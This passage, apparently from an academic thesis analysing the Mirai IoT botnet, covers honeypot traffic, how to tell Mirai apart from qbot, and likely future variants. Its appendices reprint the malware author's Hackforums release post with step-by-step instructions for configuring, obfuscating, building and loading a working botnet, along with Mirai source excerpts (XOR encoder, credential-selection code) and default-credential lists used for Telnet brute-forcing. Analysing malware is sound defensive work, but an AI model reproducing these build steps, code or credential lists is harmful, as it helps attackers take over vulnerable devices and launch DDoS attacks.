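hourly = packets_per_bucket(synthetic)
```

On this synthetic input, `spikes(hourly)` returns only bucket 19, the hour that corresponds to 7 PM when the capture starts at midnight.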

Figure 5.10. Input-Output Graph Device 1 (April 30 - May 1)

Figure 5.11. Input-Output Graph Device 2 (April 30 - May 1)

However, if we look at Figure 5.12, which represents the same time period on device 2 but three days later, we see no spike. The traffic observed over this 24-hour period is relatively consistent.

Figure 5.12. Input-Output Graph Device 2 (May 3 - May 4)

These results are consistent with the idea that Mirai and similar IoT botnets are different from traditional botnets. The bots are always online and are thus active 24 hours a day, 7 days a week. This gives an attacker more flexibility when conducting a DDoS attack, as they can choose any time for the attack to occur. The fact that these devices are always online also implies that they are rarely interacted with directly by an actual user (at least as far as the configuration of the device is concerned). This allows the adversary to keep the bots in their botnet and evade detection for longer.

5.6 Distinguishing Mirai from Other Botnet Traffic

As stated in section 2.1.3, Mirai was not the first botnet to attack IoT devices, and it is not the only one currently in the wild. Many of them, like qbot [41], also attack by trying default credentials on the Telnet port. It can therefore be difficult to distinguish between different flavors of IoT botnets, especially if an operator modifies the credentials list. Qbot (also known as BASHLITE) is the other major Telnet botnet in circulation today, and its source code has been released as well. Qbot has separate hardcoded lists of usernames and passwords and tries different combinations of the two:

• Usernames: root, admin, user, login, guest, support

• Passwords: root, toor, admin, user, guest, login, 1234, 12345, 123456, default, [empty string], password, support
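The two lists above imply a small, fixed space of username:password pairs. The sketch below enumerates that space and tests whether an observed pair falls outside it. It assumes qbot may pair any listed username with any listed password, which is one reading of "tries different combinations". The function names are hypothetical.

```python
from itertools import product

QBOT_USERNAMES = ["root", "admin", "user", "login", "guest", "support"]
QBOT_PASSWORDS = ["root", "toor", "admin", "user", "guest", "login", "1234",
                  "12345", "123456", "default", "", "password", "support"]


def qbot_pairs():
    """Every username/password pair the two unmodified lists can produce."""
    return set(product(QBOT_USERNAMES, QBOT_PASSWORDS))


def outside_qbot_space(username, password):
    """True if an observed pair cannot come from the unmodified qbot lists."""
    return (username, password) not in qbot_pairs()
```

The unmodified lists yield 6 x 13 = 78 pairs. A generic pair such as admin:admin lies inside this space, while a device-specific pair such as root:7ujMko0admin does not. This only indicates that the traffic did not come from stock qbot, and it says nothing about modified variants.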

Unless an operator modifies these lists, the credentials tried by qbot are very generic, unlike Mirai, which tries combinations like root:7ujMko0admin in addition to generic ones. Because qbot tries different permutations of its usernames and passwords, it is unlikely that an adversary using qbot will add obscure, device-specific credentials to its lists. Therefore, if such credentials are seen, the traffic is likely to be Mirai. Another difference between Mirai and other IoT botnets is that basic Mirai closes the connection after each login attempt. In our experiments, we saw some bots attempt multiple credential combinations in a single session. These bots are not running the version of Mirai that was released, though it is entirely possible that some users modified the code.

Chapter 6 | Conclusions & Takeaways

The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that effectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work.

Bruce Schneier

6.1 Where We Are Now

Vulnerable IoT devices are creating one of the worst cyber threats in the world today, a challenge that is likely to become more difficult in the years to come. To date, Mirai has been responsible for the largest DDoS attacks ever recorded. The code that was released in October 2016 has immense capabilities, which have likely been improved in the months since. We found that our Telnet servers were usually taking in several packets of traffic per second, all of which was almost certainly malicious, considering that we were not using these devices for anything else. As noted in Chapter 2, there are a few major strains of competing IoT botnets, so our collected traffic most likely represents a mix of them. We also found that the set of devices targeted by Mirai and similar IoT malware has expanded, as evidenced by the wide variety of username and password pairs that were tried against our servers.

6.2 Improvements to Mirai

Mirai is not a perfect piece of code, and adversaries could easily - and are likely to - improve its functionality. We know that future generations will be much more sophisticated, targeting additional vulnerabilities with more attack vectors.

6.2.1 Scanning Strategies

Currently, Mirai implements no IP selection algorithm. Bots select random IP addresses when attempting to infect new hosts. Even early worms, like Code Red II, attempted to develop a good spreading algorithm to infiltrate the Internet more quickly. Future variants of Mirai are very likely to target machines on the local network first. If a user has one vulnerable connected device, they likely have more on their network. Additionally, an IP address on the local network is more likely to be online than a random IP address on the Internet. Future variants may also implement geographic targeting. As shown in Chapter 5, vulnerable devices are more numerous in certain Asian countries, the United States, and Brazil, and adversaries may find more success by targeting these locations specifically.

6.2.2 Packet Payload

Future iterations of Mirai may introduce attempts to avoid detection by firewalls and intrusion detection systems that utilize deep packet inspection. As discussed extensively in Chapter 5, Mirai's IP and TCP packet headers are designed to appear benign and act normally. However, upon looking at the payload, its behavior diverges sharply from that of a real client. Currently, one way we may identify Mirai from the payload alone is the lack of Telnet negotiation on the part of the bot. It would not be overly difficult, and would add little overhead, to have the bots send a few random configuration requests.

6.2.3 Default Password List

Mirai currently attacks targets utilizing a default password list. It is hardcoded, and credential pairs are chosen using a hardcoded priority value. Potential variants of Mirai could see a more dynamic version of this list. We were targeted with credentials not found in the original list, many of which are for devices designed and built in Asia. As new IoT devices are released without secure credentials, they too will be added to the list.
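One plausible reading of "a hardcoded priority value", suggested by the `weight_min` and `weight_max` fields of `scanner_auth` in Listing A.2, is a weighted random choice in which each credential owns a range of integers proportional to its weight. The sketch below illustrates that idea only. The weights are invented for the example, and the helper names `build_table` and `pick` are hypothetical rather than taken from the Mirai source.

```python
import random
from dataclasses import dataclass


@dataclass
class AuthEntry:
    username: str
    password: str
    weight_min: int  # first integer owned by this entry (inclusive)
    weight_max: int  # one past the last integer owned (exclusive)


def build_table(weighted_credentials):
    """Assign consecutive integer ranges sized by each entry's weight."""
    table, total = [], 0
    for username, password, weight in weighted_credentials:
        table.append(AuthEntry(username, password, total, total + weight))
        total += weight
    return table, total


def pick(table, total, r=None):
    """Return the entry whose range contains r (random if r is not given)."""
    if r is None:
        r = random.randrange(total)
    for entry in table:
        if entry.weight_min <= r < entry.weight_max:
            return entry
    raise ValueError("r is outside the table's weight range")


# Illustrative weights only; the credential pairs are ones quoted in Chapter 5.
table, total = build_table([("root", "7ujMko0admin", 10),
                            ("e8ehome", "e8ehome", 7),
                            ("root", "hg2x0", 1)])
```

With these weights, values 0 to 9 select the first pair, 10 to 16 the second, and 17 the third, so higher-priority credentials are tried proportionally more often. A more dynamic list, as discussed above, would amount to rebuilding this table at run time.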

6.2.4 New Vulnerabilities

It will not be long until the default password vulnerability that Mirai targets becomes nonviable. We have already seen that a few manufacturers - including Hikvision, Samsung, and Panasonic - have begun to require users to create a unique, secure password upon initial setup [42]. It will not be long before these manufacturers move away from Telnet - an inherently insecure protocol - entirely and implement more secure protocols, like SSH. Soon, different, more traditional vulnerabilities will begin to be exploited by future generations of Mirai. They may execute buffer-overflow attacks, injection attacks, and more. These attacks are likely to be very successful against IoT. IoT devices tend to be simpler than PCs, often with old architectures, and many vulnerabilities in these older systems have already been found. When new vulnerabilities are found in an IoT device, attackers will be able to exploit them for longer than normal, as IoT devices are updated less often and have a longer shelf life than a traditional PC.

6.2.5 Attack Vectors & Monetization

Mirai will become increasingly monetized with more attack vectors. We have already seen how Mirai is deep into the DDoS-for-hire sector, something that will likely continue. IoT devices are beginning to carry more and more important personal information, such as medical devices that can send information to a physician or devices that can carry out financial transactions. As we have seen in the past with Torpig, for example, adversaries will begin to steal this personal information and sell it. Additionally, we may see adversaries use IoT devices to conduct ransomware attacks or attempt to conduct espionage against governments or corporations. Finally, it won't be long before future generations of Mirai are able to move out of the digital world and conduct attacks on infrastructure. This may be realized in attacking public infrastructure to cause city-wide outages, attacking agriculture systems to cause food shortages, or taking down important devices in thousands of homes to cause economic issues or even a state of emergency.

6.3 Takeaways

In this thesis we aimed to provide an in-depth analysis of a preeminent cyber threat in the world today. We hope to lay the groundwork for researchers and users interested in protecting the Internet of Things against malware like Mirai. We investigated the code to discover exactly how Mirai works. We watched Mirai in the wild to further investigate its behavior. We saw that IoT botnets are extremely widespread, that they are targeting a variety of vulnerable IoT devices, and that deep-packet inspection of the scanning traffic can distinguish malicious from benign traffic. The arms race between adversaries and defenders will continue to escalate. In the future, if researchers become better at tracking and taking down Mirai botnets, it is likely that botnets will not grow as large and that botnet creators will have to update their code to better avoid detection, hopefully causing the spread to slow. It is also all but certain that adversaries will fine-tune Mirai or even attack other weaknesses present in the Internet of Things. This will force security researchers to rethink their strategies. Unfortunately, the complete security of the Internet of Things cannot come from researchers alone. We need to better educate consumers on the importance of security in their connected home. In a 2017 study by Pew Research Center, only 16% of adults surveyed even knew what a botnet was [43]! Thus, the real change needs to come from manufacturers and governments. Manufacturers need to take more responsibility and implement better security in their devices. As we have seen with Hikvision, Samsung, and Panasonic, the picture is slowly becoming less bleak [42]. Governments need to work to ensure that the devices made and sold in their countries implement good security practices. This is already happening. In January 2017, the Federal Trade Commission filed a lawsuit against D-Link for implementing bad security in their products and for failing to address known security flaws [44].
Adversaries - especially in the case of IoT - have historically targeted the easiest vulnerabilities available. This trend will continue unless manufacturers begin to require more secure authentication, users begin to understand security in the IoT world, and governments implement more stringent security requirements. By getting rid of the low-hanging fruit, we can once again raise the barrier of entry for malicious entities and cripple these extremely powerful botnets. Unfortunately, the situation will get worse before it gets better. In the meantime, we hope that our investigation helps to begin the process of implementing better security in this new era.

Appendix A | Mirai Botnet Source Code Selections

This appendix contains excerpts of the Mirai source code, which was released in early October by its supposed author, Anna-senpai, on the hacker website Hackforums [28]. It was soon republished on GitHub by the user jgamblin [7]; that copy is the code analyzed in this thesis. Section A.1 contains the text of the blog post accompanying the release of the malware on Hackforums. It has some notable information on setting up the bot. In addition, it gives us an insight into the writer's personality, which can be very valuable in determining who they are, what they used Mirai for, and why they released it.

A.1 Hackforums Blog Post

[FREE] World’s Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 AM

A.1.1 Preface

Greetz everybody,

When I first go in DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot. So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie

• http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html

• https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html <- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol

Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than you kiddos" don’t make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL

Let me give you some slaps back -

1. port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together

2. /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb

3. You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol "And doing the backdoor to connect via HTTP on 65.222.202.53". you got tripped up by signal flow ;) try harder skiddo

4. Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol

5. you say ’chroot("/") so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for you

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back. Just as I forever be free, you will be doomed to mediocracy forever.

A.1.2 Requirements

Bare Minimum

2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

Pro Setup (my setup)

2 VPS and 4 servers

• 1 VPS with extremely bulletproof host for database server

• 1 VPS, rootkitted, for scanReceiver and distributor

• 1 server for CNC (used like 2

• 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

A.1.3 Infrastructure Overview

• To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address

• Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.

• Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading. The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

A.1.4 Configuring Bot

Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

• TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can ﬁnd new IPs, lol. Retards :)

• TABLE_CNC_PORT - Port to connect to, its set to 23 already

• TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to

• TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file

Run this inside mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won’t affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com

The output should look like this

XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22

To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR’ing 20 bytes of data". This value must replace the last argument tas well. So for example, the table.c line originally looks like this

add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com

Now that we know value from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com

Some values are strings, some are port (uint16 in network order / big endian).

A.1.5 Configuring CNC

apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:

http://pastebin.com/86d0iL9g

This will create database for you. To add your user,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

Now, go into file ./mirai/cnc/main.go

Edit these values

const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"

To the information for the mysql server you just installed

A.1.6 Setting Up Cross Compilers

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

http://pastebin.com/1rRCc3aD

A.1.7 Building CNC + Bot

The CNC, bot, and related tools: 1. http://santasbigcandycane.cx/mirai.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!

2. http://santasbigcandycane.cx/loader.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!

A.1.7.1 How to build bot + CNC

In mirai folder, there is build.sh script.

./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder

./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder

A.1.8 Building Echo Loader

Loader reads telnet entries from STDIN in following format:

ip:port user:pass

It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here

http://santasbigcandycane.cx/dlr.src.zip

You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow. When you compile, place your dlr.* files into the folder ./bins for the loader

./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this

cat file.txt | ./loader

Remember to ulimit!

Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "My bot not connect, fix it"

A.2 Custom Data Structures

The Mirai code defines several custom data structures, the most important of which are listed here.

A.2.1 Connection Structure

Listing A.1. Connection Struct

struct server_worker {
    struct server *srv;
    int efd; // We create a separate epoll context per thread so thread safety
             // isn't our problem
    pthread_t thread;
    uint8_t thread_id;
};

struct server {
    uint32_t max_open;
    volatile uint32_t curr_open;
    volatile uint32_t total_input, total_logins, total_echoes, total_wgets,
                      total_tftps, total_successes, total_failures;
    char *wget_host_ip, *tftp_host_ip;
    struct server_worker *workers;
    struct connection **estab_conns;
    ipv4_t *bind_addrs;
    pthread_t to_thrd;
    port_t wget_host_port;
    uint8_t workers_len, bind_addrs_len;
    int curr_worker_child;
};

struct binary {
    char arch[6];
    int hex_payloads_len;
    char **hex_payloads;
};

struct telnet_info {
    char user[32], pass[32], arch[6], writedir[32];
    ipv4_t addr;
    port_t port;
    enum {
        UPLOAD_ECHO,
        UPLOAD_WGET,
        UPLOAD_TFTP
    } upload_method;
    BOOL has_auth, has_arch;
};

struct connection {
    pthread_mutex_t lock;
    struct server *srv;
    struct binary *bin;
    struct telnet_info info;
    int fd, echo_load_pos;
    time_t last_recv;
    enum {
        TELNET_CLOSED,          // 0
        TELNET_CONNECTING,      // 1
        TELNET_READ_IACS,       // 2
        TELNET_USER_PROMPT,     // 3
        TELNET_PASS_PROMPT,     // 4
        TELNET_WAITPASS_PROMPT, // 5
        TELNET_CHECK_LOGIN,     // 6
        TELNET_VERIFY_LOGIN,    // 7
        TELNET_PARSE_PS,        // 8
        TELNET_PARSE_MOUNTS,    // 9
        TELNET_READ_WRITEABLE,  // 10
        TELNET_COPY_ECHO,       // 11
        TELNET_DETECT_ARCH,     // 12
        TELNET_ARM_SUBTYPE,     // 13
        TELNET_UPLOAD_METHODS,  // 14
        TELNET_UPLOAD_ECHO,     // 15
        TELNET_UPLOAD_WGET,     // 16
        TELNET_UPLOAD_TFTP,     // 17
        TELNET_RUN_BINARY,      // 18
        TELNET_CLEANUP          // 19
    } state_telnet;
    struct {
        char data[512];
        int deadline;
    } output_buffer;
    uint16_t rdbuf_pos, timeout;
    BOOL open, success, retry_bin, ctrlc_retry;
    uint8_t rdbuf[8192];
};

A.2.2 Scanner Connection Structure

Listing A.2. Scanner Connection Struct

struct scanner_auth {
    char *username;
    char *password;
    uint16_t weight_min, weight_max;
    uint8_t username_len, password_len;
};

struct scanner_connection {
    struct scanner_auth *auth;
    int fd, last_recv;
    enum {
        SC_CLOSED,
        SC_CONNECTING,
        SC_HANDLE_IACS,
        SC_WAITING_USERNAME,
        SC_WAITING_PASSWORD,
        SC_WAITING_PASSWD_RESP,
        SC_WAITING_ENABLE_RESP,
        SC_WAITING_SYSTEM_RESP,
        SC_WAITING_SHELL_RESP,
        SC_WAITING_SH_RESP,
        SC_WAITING_TOKEN_RESP
    } state;
    ipv4_t dst_addr;
    uint16_t dst_port;
    int rdbuf_pos;
    char rdbuf[SCANNER_RDBUF_SIZE];
    uint8_t tries;
};

A.2.3 Command and Control Client List

Go implements a data type called channels (see chan in the code), which are "pipes that connect concurrent goroutines" [45]. Essentially, channels allow goroutines (i.e., concurrently executing functions) to send values to and receive values from one another, with a send or receive blocking by default until the other side is ready.

Listing A.3. CNC Client List Struct

type Bot struct {
    uid     int
    conn    net.Conn
    version byte
    source  string
}

type ClientList struct {
    uid         int
    count       int
    clients     map[int]*Bot
    addQueue    chan *Bot
    delQueue    chan *Bot
    atkQueue    chan *AttackSend
    totalCount  chan int
    cntView     chan int
    distViewReq chan int
    distViewRes chan map[string]int
    cntMutex    *sync.Mutex
}

A.3 Constants Table

/* Generic bot info */
#define TABLE_PROCESS_ARGV              1
#define TABLE_EXEC_SUCCESS              2
#define TABLE_CNC_DOMAIN                3
#define TABLE_CNC_PORT                  4

/* Killer data */
#define TABLE_KILLER_SAFE               5
#define TABLE_KILLER_PROC               6
#define TABLE_KILLER_EXE                7
#define TABLE_KILLER_DELETED            8   /* "(deleted)" */
#define TABLE_KILLER_FD                 9   /* "/fd" */
#define TABLE_KILLER_ANIME              10  /* .anime */
#define TABLE_KILLER_STATUS             11
#define TABLE_MEM_QBOT                  12
#define TABLE_MEM_QBOT2                 13
#define TABLE_MEM_QBOT3                 14
#define TABLE_MEM_UPX                   15
#define TABLE_MEM_ZOLLARD               16
#define TABLE_MEM_REMAITEN              17

/* Scanner data */
#define TABLE_SCAN_CB_DOMAIN            18  /* domain to connect to */
#define TABLE_SCAN_CB_PORT              19  /* Port to connect to */
#define TABLE_SCAN_SHELL                20  /* 'shell' to enable shell access */
#define TABLE_SCAN_ENABLE               21  /* 'enable' to enable shell access */
#define TABLE_SCAN_SYSTEM               22  /* 'system' to enable shell access */
#define TABLE_SCAN_SH                   23  /* 'sh' to enable shell access */
#define TABLE_SCAN_QUERY                24  /* echo hex string to verify login */
#define TABLE_SCAN_RESP                 25  /* utf8 version of query string */
#define TABLE_SCAN_NCORRECT             26
/* 'ncorrect' to fast-check for invalid password */
#define TABLE_SCAN_PS                   27  /* "/bin/busybox ps" */
#define TABLE_SCAN_KILL_9               28  /* "/bin/busybox kill -9 " */

/* Attack strings */
#define TABLE_ATK_VSE                   29  /* TSource Engine Query */
#define TABLE_ATK_RESOLVER              30  /* /etc/resolv.conf */
#define TABLE_ATK_NSERV                 31  /* "nameserver " */

#define TABLE_ATK_KEEP_ALIVE            32  /* "Connection: keep-alive" */
#define TABLE_ATK_ACCEPT                33
// "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
#define TABLE_ATK_ACCEPT_LNG            34  // "Accept-Language: en-US,en;q=0.8"
#define TABLE_ATK_CONTENT_TYPE          35
// "Content-Type: application/x-www-form-urlencoded"
#define TABLE_ATK_SET_COOKIE            36  // "setCookie('"
#define TABLE_ATK_REFRESH_HDR           37  // "refresh:"
#define TABLE_ATK_LOCATION_HDR          38  // "location:"
#define TABLE_ATK_SET_COOKIE_HDR        39  // "set-cookie:"
#define TABLE_ATK_CONTENT_LENGTH_HDR    40  // "content-length:"
#define TABLE_ATK_TRANSFER_ENCODING_HDR 41  // "transfer-encoding:"
#define TABLE_ATK_CHUNKED               42  // "chunked"
#define TABLE_ATK_KEEP_ALIVE_HDR        43  // "keep-alive"
#define TABLE_ATK_CONNECTION_HDR        44  // "connection:"
#define TABLE_ATK_DOSARREST             45  // "server: dosarrest"
#define TABLE_ATK_CLOUDFLARE_NGINX      46  // "server: cloudflare-nginx"

/* User agent strings */
#define TABLE_HTTP_ONE                  47
/* "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
   Chrome/51.0.2704.103 Safari/537.36" */
#define TABLE_HTTP_TWO                  48
/* "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
   Chrome/52.0.2743.116 Safari/537.36" */
#define TABLE_HTTP_THREE                49
/* "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
   Chrome/51.0.2704.103 Safari/537.36" */
#define TABLE_HTTP_FOUR                 50
/* "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
   Chrome/52.0.2743.116 Safari/537.36" */
#define TABLE_HTTP_FIVE                 51
/* "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7
   (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" */

#define TABLE_MAX_KEYS                  52  /* Highest value + 1 */

A.4 Built-in Encoding and Decoding

A.4.1 Encoding Functionality

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <string.h>
    #include <arpa/inet.h>

    static uint32_t table_key = 0xdeadbeef;

    void *x(void *, int);

    int main(int argc, char **args)
    {
        void *data;
        int len, i;

        if (argc != 3)
        {
            printf("Usage: %s <string | ip | uint32 | uint16 | uint8 | bool> <data>\n", args[0]);
            return 0;
        }

        /* Convert the second argument into raw bytes according to its type. */
        if (strcmp(args[1], "string") == 0)
        {
            data = args[2];
            len = strlen(args[2]) + 1;
        }
        else if (strcmp(args[1], "ip") == 0)
        {
            data = calloc(1, sizeof (uint32_t));
            *((uint32_t *)data) = inet_addr(args[2]);
            len = sizeof (uint32_t);
        }
        else if (strcmp(args[1], "uint32") == 0)
        {
            data = calloc(1, sizeof (uint32_t));
            *((uint32_t *)data) = htonl((uint32_t)atoi(args[2]));
            len = sizeof (uint32_t);
        }
        else if (strcmp(args[1], "uint16") == 0)
        {
            data = calloc(1, sizeof (uint16_t));
            *((uint16_t *)data) = htons((uint16_t)atoi(args[2]));
            len = sizeof (uint16_t);
        }
        else if (strcmp(args[1], "uint8") == 0)
        {
            data = calloc(1, sizeof (uint8_t));
            *((uint8_t *)data) = atoi(args[2]);
            len = sizeof (uint8_t);
        }
        else if (strcmp(args[1], "bool") == 0)
        {
            data = calloc(1, sizeof (char));
            if (strcmp(args[2], "false") == 0)
                ((char *)data)[0] = 0;
            else if (strcmp(args[2], "true") == 0)
                ((char *)data)[0] = 1;
            else
            {
                printf("Unknown value `%s` for datatype bool!\n", args[2]);
                return -1;
            }
            len = sizeof (char);
        }
        else
        {
            printf("Unknown data type `%s`!\n", args[1]);
            return -1;
        }

        // Yes we are leaking memory, but the program is so
        // short lived that it doesn't really matter...
        printf("XOR'ing %d bytes of data...\n", len);
        data = x(data, len);
        for (i = 0; i < len; i++)
            printf("\\x%02X", ((unsigned char *)data)[i]);
        printf("\n");
    }

    /* XOR every input byte with each of the four bytes of table_key in turn. */
    void *x(void *_buf, int len)
    {
        unsigned char *buf = (unsigned char *)_buf, *out = malloc(len);
        int i;
        uint8_t k1 = table_key & 0xff,
                k2 = (table_key >> 8) & 0xff,
                k3 = (table_key >> 16) & 0xff,
                k4 = (table_key >> 24) & 0xff;

        for (i = 0; i < len; i++)
        {
            char tmp = buf[i] ^ k1;

            tmp ^= k2;
            tmp ^= k3;
            tmp ^= k4;

            out[i] = tmp;
        }

        return out;
    }
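Because XOR is associative and commutative, applying the four key bytes of 0xdeadbeef one after another has the same effect as a single XOR with 0xDE ^ 0xAD ^ 0xBE ^ 0xEF = 0x22. The sketch below illustrates this under that observation; the helper names `collapsed_key` and `xor_buf` are hypothetical and do not appear in the Mirai source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fold the four bytes of a 32-bit key into the single byte that the
 * per-byte XOR loop effectively applies. (Hypothetical helper.) */
static uint8_t collapsed_key(uint32_t key)
{
    return (uint8_t)((key & 0xff) ^ ((key >> 8) & 0xff) ^
                     ((key >> 16) & 0xff) ^ ((key >> 24) & 0xff));
}

/* XOR every byte of buf in place with k. Running it a second time
 * restores the input, so one routine both encodes and decodes. */
static void xor_buf(uint8_t *buf, size_t len, uint8_t k)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= k;
}
```

With this key, the string "root" encodes to \x50\x4D\x4D\x56, and encoding those bytes again yields "root". In effect the scheme is a single-byte XOR, which hides strings from a casual `strings` inspection but offers no real confidentiality.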

A.4.2 Decoding Functionality

    /* auth_table, auth_table_len and auth_table_max_weight are file-scope
       variables in scanner.c; util_strlen(), util_memcpy() and rand_next()
       are Mirai helper functions. */

    static char *deobf(char *str, int *len)
    {
        int i;
        char *cpy;

        *len = util_strlen(str);
        cpy = malloc(*len + 1);

        util_memcpy(cpy, str, *len + 1);

        /* Undo the encoding by XORing with each key byte in turn. */
        for (i = 0; i < *len; i++)
        {
            cpy[i] ^= 0xDE;
            cpy[i] ^= 0xAD;
            cpy[i] ^= 0xBE;
            cpy[i] ^= 0xEF;
        }

        return cpy;
    }

    static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
    {
        int tmp;

        auth_table = realloc(auth_table, (auth_table_len + 1) *
                             sizeof (struct scanner_auth));
        auth_table[auth_table_len].username = deobf(enc_user, &tmp);
        auth_table[auth_table_len].username_len = (uint8_t)tmp;
        auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
        auth_table[auth_table_len].password_len = (uint8_t)tmp;
        auth_table[auth_table_len].weight_min = auth_table_max_weight;
        auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
        auth_table_max_weight += weight;
    }

    static struct scanner_auth *random_auth_entry(void)
    {
        /* This method is used to select an auth combination to try. */
        int i;
        uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);

        for (i = 0; i < auth_table_len; i++)
        {
            if (r < auth_table[i].weight_min)
                continue;
            else if (r < auth_table[i].weight_max)
                return &auth_table[i];
        }

        return NULL;
    }

Appendix B | Supplemental Data

B.1 Hardcoded List of Default Credentials

Mirai attempts to log into devices via telnet on either port 23 or port 2323, using a hardcoded list of default credentials. This list is defined and built in scanner.c within the scanner_init() function.

| # | Username | Password |
|---|---|---|
| 1 | 666666 | 666666 |
| 2 | 888888 | 888888 |
| 3 | Administrator | admin |
| 4 | admin | [empty string] |
